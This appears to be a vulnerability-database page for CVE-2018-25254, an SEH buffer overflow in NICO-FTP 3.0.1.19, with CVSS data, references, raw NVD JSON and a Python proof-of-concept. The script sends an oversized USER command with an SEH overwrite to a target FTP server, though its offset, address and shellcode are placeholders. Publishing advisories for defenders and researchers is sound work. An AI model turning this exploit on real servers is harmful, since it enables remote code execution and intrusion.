CVE-2018-25254

Description

NICO-FTP 3.0.1.19 contains a structured exception handler buffer overflow vulnerability that allows remote attackers to execute arbitrary code by sending crafted FTP commands. Attackers can connect to the FTP service and send oversized data in response handlers to overwrite SEH pointers and redirect execution to injected shellcode.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nico-ftp_project:nico-ftp:*:*:*:*:*:*:*:* - VULNERABLE

NICO-FTP 3.0.1.19

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket

# Target configuration
target_ip = "192.168.1.100"
target_port = 21

# Payload construction
# Offset to overwrite SEH (Example value, actual offset requires debugging)
offset = b"A" * 1000  

# Next SEH record (pop pop ret sequence bypass)
nseh = b"\xeb\x06\x90\x90" # short jump + nops

# SEH handler address (Pop Pop Ret from non-ASLR module)
seh = b"\xaf\x11\x50\x62" # Example address

# Shellcode (calc.exe or reverse shell)
shellcode = b"\xcc" * 300 

padding = b"C" * (5000 - len(offset) - len(nseh) - len(seh) - len(shellcode))

payload = offset + nseh + seh + shellcode + padding
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))
    print(f"[+] Connected to {target_ip}:{target_port}")
    
    # Sending malicious command to trigger overflow
    s.send(b"USER " + payload + b"\r\n")
    print("[+] Payload sent")
    s.close()
except Exception as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25254
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25254
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25254/
[4] VulDB https://vuldb.com/cve/CVE-2018-25254
[5] https://en.softonic.com/download/nico-ftp/windows/post-download
[6] https://www.exploit-db.com/exploits/45442
[7] https://www.vulncheck.com/advisories/nico-ftp-buffer-overflow-seh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25254", "sourceIdentifier": "[email protected]", "published": "2026-04-04T14:16:21.743", "lastModified": "2026-04-27T13:26:40.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NICO-FTP 3.0.1.19 contains a structured exception handler buffer overflow vulnerability that allows remote attackers to execute arbitrary code by sending crafted FTP commands. Attackers can connect to the FTP service and send oversized data in response handlers to overwrite SEH pointers and redirect execution to injected shellcode."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nico-ftp_project:nico-ftp:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.0.1.19", "matchCriteriaId": "E21A9A8B-2157-4078-9F5A-1FE4F9A11C74"}]}]}], "references": [{"url": "https://en.softonic.com/download/nico-ftp/windows/post-download", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/45442", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/nico-ftp-buffer-overflow-seh", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}